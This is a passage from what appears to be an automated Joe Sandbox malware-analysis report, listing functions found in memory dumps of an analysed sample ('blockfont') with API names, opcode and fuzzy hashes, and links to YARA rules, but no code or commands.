                                • API String ID: 1091760877-2248577382
                                • Opcode ID: 4beeed0ac83104984b1f547c0ad96c2c221840a7c2f278483994200cf0021ecc
                                • Instruction ID: 73506b787e667e361c96a690f03c0c376e7bb1a49830050c43a23ffaf0192cbb
                                • Opcode Fuzzy Hash: 4beeed0ac83104984b1f547c0ad96c2c221840a7c2f278483994200cf0021ecc
                                • Instruction Fuzzy Hash: 5BD05E31A081306BCB103B64AC0ADAF7D099F52770F248719F23DA52F6DA22495182F6
                                Function 00D6DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,00D6D32F,?), ref: 00D6DA53
                                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00D6D32F,?), ref: 00D6DA61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: FindHandleModuleResource
                                • String ID: RTL
                                • API String ID: 3537982541-834975271
                                • Opcode ID: b177d7e905c164584dd2b4ff94f64213ad80fa47d7965f59b955503d78ccbe90
                                • Instruction ID: 47a4fc0496451268ecca4faf62d66d27b5df5903e102900f0a7b23d71b754faf
                                • Opcode Fuzzy Hash: b177d7e905c164584dd2b4ff94f64213ad80fa47d7965f59b955503d78ccbe90
                                • Instruction Fuzzy Hash: 23C0123178935077DB301B607C0DB4329485B10B11F09044DB145DA2D0D5F6C9448670

                                Executed Functions

                                Function 00007FFD9B8E3585 Relevance: .3, Instructions: 295COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 969f2cdd3e7a048a86fb8fe3b4ffefefd446b3798ac7b6d16da23b552d24051f
                                • Instruction ID: 7e1649867f5782b0f5f95be69aae9346c59d3fbff3043432e8ecee9ff7e96553
                                • Opcode Fuzzy Hash: 969f2cdd3e7a048a86fb8fe3b4ffefefd446b3798ac7b6d16da23b552d24051f
                                • Instruction Fuzzy Hash: 82A1C471A0994D8FEB99EB68C8257ADBBE1FF5A310F5002BAD019D72E9DF7468018740
                                Function 00007FFD9B8EF809 Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID: .$R
                                • API String ID: 0-3105842054
                                • Opcode ID: 964582160915fbb67c028f2e670053954e30055f27c990ac37b0d25dfc8b3e5c
                                • Instruction ID: f122d5888076dbeeab4b2a53bdefde13b14484f982dfbe067f612bcdcbccda1e
                                • Opcode Fuzzy Hash: 964582160915fbb67c028f2e670053954e30055f27c990ac37b0d25dfc8b3e5c
                                • Instruction Fuzzy Hash: 0751DA71E19A5E8FDBA8DF18CCA57A9B7B1EF58301F5101E9900DE32A1DA356E81CF40
                                Function 00007FFD9B8EEB95 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID: #$}
                                • API String ID: 0-437702028
                                • Opcode ID: c2c04a9f05cf03fb2a389f110bfa9da2f1f6e6f446a5056cb1dc232bbc04bee8
                                • Instruction ID: 5025935d781d986a23677b3a82c1451bc3dfe6a1b9b36d78c8d828bf6a4f4b04
                                • Opcode Fuzzy Hash: c2c04a9f05cf03fb2a389f110bfa9da2f1f6e6f446a5056cb1dc232bbc04bee8
                                • Instruction Fuzzy Hash: 6421DB30E1952E8FDFA8EF54D8A47F9B7B1EB58301F1101BAD40D92291DB345A80CF40
                                Function 00007FFD9B8ECCFB Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID: wM_^
                                • API String ID: 0-505308354
                                • Opcode ID: f669e416949e8fd1f44014ec719e52b58a345af43115434b6be7d1bd82019ba9
                                • Instruction ID: a9e43c636774ff3a899712e623c5eb4493e1bbb2ca8412e1a7c97416d7a00486
                                • Opcode Fuzzy Hash: f669e416949e8fd1f44014ec719e52b58a345af43115434b6be7d1bd82019ba9
                                • Instruction Fuzzy Hash: E6512626F0E51F4AEB697BA8A8284FD7BA0EF48335F060177D51DC60E2DE64355086A0
                                Function 00007FFD9B8ECB99 Relevance: .4, Instructions: 427COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 213f1647c4a603cc3047089223556c63451bd776ddb555a5638a392b9ebc4b72
                                • Instruction ID: c7980ab1916064ff799c43e20009dabf0e768f38704d6bc7c941221ee5f5d2ed
                                • Opcode Fuzzy Hash: 213f1647c4a603cc3047089223556c63451bd776ddb555a5638a392b9ebc4b72
                                • Instruction Fuzzy Hash: 5FF19E31E1921E8FDB64EFA8D8646EDBBB0EF49311F1100BAD049D71A2DB386A45CB50
                                Function 00007FFD9B8EDD49 Relevance: .4, Instructions: 392COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5d63ff6c0207de6a2781c2f88aa41e83a27f134b11e36c40dd708ae6c18d3eb
                                • Instruction ID: d8bcf1799137f66a828a39f7befd6d5fd65b978498bb932cbf06e91c9f9768d7
                                • Opcode Fuzzy Hash: d5d63ff6c0207de6a2781c2f88aa41e83a27f134b11e36c40dd708ae6c18d3eb
                                • Instruction Fuzzy Hash: 2FE15F71E19A5D8FDBACEB58C8A4BB8B7B1FF58300F4441B9D01DD32A6DA346944CB41
                                Function 00007FFD9B8E1698 Relevance: .3, Instructions: 284COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 55f0e374e2c43599ea08deac248f613bda26d5b0e1efd884442320c0def61e19
                                • Instruction ID: 173d80a9cf389508d7184659cf9424631784ac6165a245e487a5d03e54e6603f
                                • Opcode Fuzzy Hash: 55f0e374e2c43599ea08deac248f613bda26d5b0e1efd884442320c0def61e19
                                • Instruction Fuzzy Hash: 4D81CF31B0DA494FDBACEF5C88615A977E2EFD8300B15057AE45DC32A6DE34AD028780
                                Function 00007FFD9B8F2F91 Relevance: .2, Instructions: 207COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 13ee7140fd2b4200ecf84dc01dd7320334633cedf1e6e3e82bf014dadf899264
                                • Instruction ID: bd32187c827f2d7e278c0945ad0fe58b69ff79ed7921b2c8cd3901bdce4ef8ff
                                • Opcode Fuzzy Hash: 13ee7140fd2b4200ecf84dc01dd7320334633cedf1e6e3e82bf014dadf899264
                                • Instruction Fuzzy Hash: 9381B570E1951D8FEBA4EB98C865BEDB7B1FF58300F5141B9D00DE7295DE346A848B40
                                Function 00007FFD9B8ECBCD Relevance: .2, Instructions: 202COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f0cce7eef4aa701dd8cbc828a479a81c1be7f639b06dc8e15a76ace81fee8b32
                                • Instruction ID: efa820031bd812d22e01db43c37bd6bd5a87901419af1a42bf4d37aaba226534
                                • Opcode Fuzzy Hash: f0cce7eef4aa701dd8cbc828a479a81c1be7f639b06dc8e15a76ace81fee8b32
                                • Instruction Fuzzy Hash: 1C71F974E1951D9FEBA8EB98C4647ADB7F1FF58300F1140BAD44DE32A1DE346A808B40
                                Function 00007FFD9B8E1D0D Relevance: .2, Instructions: 189COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ec6cec5879cbe357a37f2f0526b18cd7e677309a6f96c10b1e37fc4db8f35af2
                                • Instruction ID: 4561fef7c7713e0dd12e4ed3e9ad2bf4ba1058a78ed13f0b8921a63ecd72bba3
                                • Opcode Fuzzy Hash: ec6cec5879cbe357a37f2f0526b18cd7e677309a6f96c10b1e37fc4db8f35af2
                                • Instruction Fuzzy Hash: 4451D131B19A4A4FDB5CEF5888645BA77E2FFD8300B15467EE45AC7291DE34E8028781
                                Function 00007FFD9B8E0525 Relevance: .2, Instructions: 162COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e430bdc812bfca19db6fdffbb7088eaafd9f8919a272c4ce7a6f82ec0e90f8b1
                                • Instruction ID: d99eda1e38da23fcc224e7cd5f89460a5cbc82dcc1bd46f74d3b38b810de8c0b
                                • Opcode Fuzzy Hash: e430bdc812bfca19db6fdffbb7088eaafd9f8919a272c4ce7a6f82ec0e90f8b1
                                • Instruction Fuzzy Hash: 62412747B0E1B606EB2573ADBC765E93B20DF8137A75E05B3D1DD8A0E3AC08644A82D5
                                Function 00007FFD9B8E31E5 Relevance: .1, Instructions: 148COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 05040b40fc1ea6dc635c603d811a0c3299db4f55ae313b0840f27a3d3a90e21d
                                • Instruction ID: b731663383b98a876d0dd6f0dbed128e0574228062556699c2081304ae45db21
                                • Opcode Fuzzy Hash: 05040b40fc1ea6dc635c603d811a0c3299db4f55ae313b0840f27a3d3a90e21d
                                • Instruction Fuzzy Hash: FC514930E0A51E8FEB69EB94D464AEDB7F1FF58301F41017AD009E72A5DA38AA44CB40
                                Function 00007FFD9B8E2125 Relevance: .1, Instructions: 140COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f544b288584022a36c6c993ba55c35d326c3484ca568ad7a2b569f579ae1b6f0
                                • Instruction ID: 1ac00dac9436b7169cc388f6602985ac481f7806c9cd3172faa1e656699d49a6
                                • Opcode Fuzzy Hash: f544b288584022a36c6c993ba55c35d326c3484ca568ad7a2b569f579ae1b6f0
                                • Instruction Fuzzy Hash: B7414931B0E64E4FE769EBB888655B877E0EF4A310B0501FBE45DC71E6DE28B9418341
                                Function 00007FFD9B8F1F90 Relevance: .1, Instructions: 127COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 217050fd760d4c67ff0da25c5c68288eb13a8a2c64d2c85801e56f19c64d38f8
                                • Instruction ID: 7bf938a602728b18a64dfa8db488c6af71a43502fbaf5db9a92335062b8d6d6e
                                • Opcode Fuzzy Hash: 217050fd760d4c67ff0da25c5c68288eb13a8a2c64d2c85801e56f19c64d38f8
                                • Instruction Fuzzy Hash: 7241CFA180E7C94FCB439B749C752D53FB0AF17214F0A40DBD488CB0A3E62C5A1AC762
                                Function 00007FFD9B8F2CFD Relevance: .1, Instructions: 122COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 327de2ca3473745ce509cf442af448b7c178b4df406240d63557dbc11ed3189e
                                • Instruction ID: 973518d4e1e427ea177b3ae07ee1bdf93c29ba8599888b8e04a171c3566d1984
                                • Opcode Fuzzy Hash: 327de2ca3473745ce509cf442af448b7c178b4df406240d63557dbc11ed3189e
                                • Instruction Fuzzy Hash: A0415C30E1560D8FDB58EFD8D869AEDB7B1FF48300F410179E009E72A6DE3469418B81
                                Function 00007FFD9B8EC5E5 Relevance: .1, Instructions: 118COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b6dd0d5f7dac91cff1979fa41f71a9a6e24613540b333f9eeae31b13cc26911
                                • Instruction ID: 1eee55fcb7ef98331f29a3330335d1aaaf38a2712a53509fd751b4ba698eb653
                                • Opcode Fuzzy Hash: 2b6dd0d5f7dac91cff1979fa41f71a9a6e24613540b333f9eeae31b13cc26911
                                • Instruction Fuzzy Hash: 5D31D874E1991D9EEBA8EB98C8A96ADB7B1FF58300F411139D00DE32A2DF2469418B40
                                Function 00007FFD9B8ECD4D Relevance: .1, Instructions: 103COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 44fa91aa67509e3e0a7afa8a966df078cfa6623fb83516a1f91b11fa10792d7f
                                • Instruction ID: c4af50fc51b8c112c62867fdd026067c15d072c3934649b9cc43964bcd5e4816
                                • Opcode Fuzzy Hash: 44fa91aa67509e3e0a7afa8a966df078cfa6623fb83516a1f91b11fa10792d7f
                                • Instruction Fuzzy Hash: 4031FB25F0D16B4AEB697BA8A8384FC7B60EF45335F560077D01DC60E3DE5835508A61
                                Function 00007FFD9B8E33E0 Relevance: .1, Instructions: 85COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8279df7b6449a2d1beb38f7117927ab91590d9e170369f8d3bde59c805028298
                                • Instruction ID: 96de14e73eadc3be40212b57b570dbe013f81685c3baa8702805d8639e401d2f
                                • Opcode Fuzzy Hash: 8279df7b6449a2d1beb38f7117927ab91590d9e170369f8d3bde59c805028298
                                • Instruction Fuzzy Hash: 67313E3094E7CA4FD753ABB488685A57FF0EF5B314B0A44E7D484CB0B3DA295946C721
                                Function 00007FFD9B8EAA51 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 31df2c6f8b93ee084d476186a8133a743edb612be6655f5ac7f8a7907474eefe
                                • Instruction ID: 5d65e25b027550707a5e70e455ca31215b5ad5ac01e0b7631bafdebeacd88cba
                                • Opcode Fuzzy Hash: 31df2c6f8b93ee084d476186a8133a743edb612be6655f5ac7f8a7907474eefe
                                • Instruction Fuzzy Hash: 3B215E70A0964D9FDB98EF58C4599AD3BF0FF5C304F01016AE41AC72A5DB34E540CB80
                                Function 00007FFD9B8EB3FA Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9d1b2ca60714bce57358ca9a64cfd4279d26b7b4543e434b630159dc4686357e
                                • Instruction ID: f42d6c71e7913f503d3765f26cfdac782d33ef31aa248e5f255f2ee126c36944
                                • Opcode Fuzzy Hash: 9d1b2ca60714bce57358ca9a64cfd4279d26b7b4543e434b630159dc4686357e
                                • Instruction Fuzzy Hash: E221D230B0A90F9FEB55FBA888A95FDB7E0FF58304F0145B6D428C30A6EE34A545C240
                                Function 00007FFD9B8E0A01 Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a5830bf09627754350c25f3ccddc0bdcc5e68e308d3a8405171b4ccac7a01186
                                • Instruction ID: e3be025c5cb91fbbc9e2dd928579ab033cf8d73027a55647a5031f02de14388b
                                • Opcode Fuzzy Hash: a5830bf09627754350c25f3ccddc0bdcc5e68e308d3a8405171b4ccac7a01186
                                • Instruction Fuzzy Hash: F311B230E2A50E8FE7A4FBA8886A5BD77E1FF58740F4149B6D418D70A6EE34A5448740
                                Function 00007FFD9B8F2A61 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a120ab4b48d21d83ba3ae144ccaa9354d645ca89499d0bc8e49760e0fe6c53b3
                                • Instruction ID: f88920e8e1e3a217f9a8997f4d03daf4d5bf75d4a5bd0c06a3eeb11b6e28a344
                                • Opcode Fuzzy Hash: a120ab4b48d21d83ba3ae144ccaa9354d645ca89499d0bc8e49760e0fe6c53b3
                                • Instruction Fuzzy Hash: A211BE30A1964D8FDB58EF64C4615E93BE1FF5C304F0205AAF809C32A1DA34A950CB81
                                Function 00007FFD9B8E084D Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b7d2093842cab86a01ff1b91f12fdacf6f5a6b09948316a8e06f0f8b0e51a71
                                • Instruction ID: c4c6360e67bc6817c9f048d4c6b3b1eabdda650a14fac7651a4fa64ea3a576c9
                                • Opcode Fuzzy Hash: 8b7d2093842cab86a01ff1b91f12fdacf6f5a6b09948316a8e06f0f8b0e51a71
                                • Instruction Fuzzy Hash: 90113A30B1D14E8FDB15BBB888AA4E83BE0FF49304F0608B3C459CB0A7ED349155C291
                                Function 00007FFD9B8F2C68 Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7db83e0981eba848103ac7b251e214d357ad4d02058217af5cc393185979daea
                                • Instruction ID: 668d42017945ddd80e3b110ba2b45fe589d086a3efc5a8cc7b8a9f521813bc99
                                • Opcode Fuzzy Hash: 7db83e0981eba848103ac7b251e214d357ad4d02058217af5cc393185979daea
                                • Instruction Fuzzy Hash: 9C11813064E68D8FD7569BB088391A93FB0BF0A315F4604EBD409CB1F3DA2D5A45C752
                                Function 00007FFD9B8EC0D5 Relevance: .1, Instructions: 58COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 363125892e43ae8b19aacfe33cab7e163eef65ede49dae21f88548dab946a016
                                • Instruction ID: 45b2bf5449a4e493834b94f2b29bf901f0e1835ba26021b5fab0c197d6de0796
                                • Opcode Fuzzy Hash: 363125892e43ae8b19aacfe33cab7e163eef65ede49dae21f88548dab946a016
                                • Instruction Fuzzy Hash: D1115230E1964E8FDB59EF64C4695BD7BE0FF18304F41057AD419C71A2DB35A6508B00
                                Function 00007FFD9B8ED1C0 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f07dbebc83c500563a23587cf03d9641ac69c2da53fa4c95e61353a1b4cb022e
                                • Instruction ID: e9ca866957dc7f23ca018fe834c99790914d5d1e7a3e3b763e46f3facbf2da6b
                                • Opcode Fuzzy Hash: f07dbebc83c500563a23587cf03d9641ac69c2da53fa4c95e61353a1b4cb022e
                                • Instruction Fuzzy Hash: D911C430B09A0E9FEB58EF6884652BD7AE0FF58300F40057AD81DC21A5DE34A540C780
                                Function 00007FFD9B8E119D Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4947d827931ad89a12d7bd5ffec5aa8b9bb636b9f28ff3e153cb6fd15abfbc01
                                • Instruction ID: e14ade905351dbc35a71d74f7b05781fb959196db3181c7b855e3bca12cbfb8e
                                • Opcode Fuzzy Hash: 4947d827931ad89a12d7bd5ffec5aa8b9bb636b9f28ff3e153cb6fd15abfbc01
                                • Instruction Fuzzy Hash: 1211B270E0A64E4EEB69FBA4C8696BD7BE0FF59300F0104BED41AC60E1EE296640C700
                                Function 00007FFD9B8F2E51 Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4633f8588fa97de4b902bc027b3028acea2c87b58a8b5d88f72db582391ec002
                                • Instruction ID: cb0b52931fb2b3d57ae2ed6fb288921e9c1408d7afcd1ba17973d6075ce7925f
                                • Opcode Fuzzy Hash: 4633f8588fa97de4b902bc027b3028acea2c87b58a8b5d88f72db582391ec002
                                • Instruction Fuzzy Hash: A011AD30A0A54E8EEB62EBB488685F97FE1FF0A300F1505B6E418C6062DA38A6848741
                                Function 00007FFD9B8EB248 Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7b9661d53c1e033a708d365287e164af46fd136bfa41147a057cc44a16329e4b
                                • Instruction ID: c110ed28a8a549d6322626124aead301ecd812245e5a2b9bd65aaf797450807b
                                • Opcode Fuzzy Hash: 7b9661d53c1e033a708d365287e164af46fd136bfa41147a057cc44a16329e4b
                                • Instruction Fuzzy Hash: E8114C30A18A0E8FDB94EFA8C4696BE7BE1FF58305F50057AE41AD31A4CB34A550CB80
                                Function 00007FFD9B8E3505 Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b708b3346364b48ebee604ced655d6edf3925669cf1f2969740fc9db3262e073
